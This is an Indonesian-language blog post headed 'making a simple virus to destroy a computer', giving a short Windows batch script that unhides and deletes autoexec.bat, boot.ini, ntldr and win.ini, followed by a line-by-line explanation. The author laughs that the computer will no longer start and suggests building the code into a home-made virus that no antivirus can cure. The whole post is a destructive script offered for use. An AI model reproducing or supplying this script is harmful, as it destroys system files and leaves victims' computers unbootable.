Membuat Virus sederhana Untuk menghancurkan Kompi

No Comments


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

simpan penggalan script diatas notepad, dan simpan dgn file apa aja, yang penting berformat *.bat


del c:\autoexec.bat <-- buat hapus autoexe.bat di direktori C
del c:\boot.ini <---- buat hapus Boot.ini di direktori C
del c:\ntldr <--- buat hapus ntldr
del c:\windows\win.ini <----- untuk hapus file win.ini yang berlokasi di C:/windows

attrib -r -s -h <--- untuk menampilkan file ke 4 windows tadi yang di supper hidden

tanpa file autoexec.bat, boot.ini, ntldr, dan win.ini

komputer yang bersistem operasikan windows tdk akan mau hidup... hahahahahaha

ehm... skrg gmn kl code tadi di masukan dalam virus buatan kita... wew... yakin deh ga ada antivirus buat penawarnya kl sudah terinfeksi.. hahaahhaha...

Dear readers, after reading the Content please ask for advice and to provide constructive feedback Please Write Relevant Comment with Polite Language.Your comments inspired me to continue blogging. Your opinion much more valuable to me. Thank you.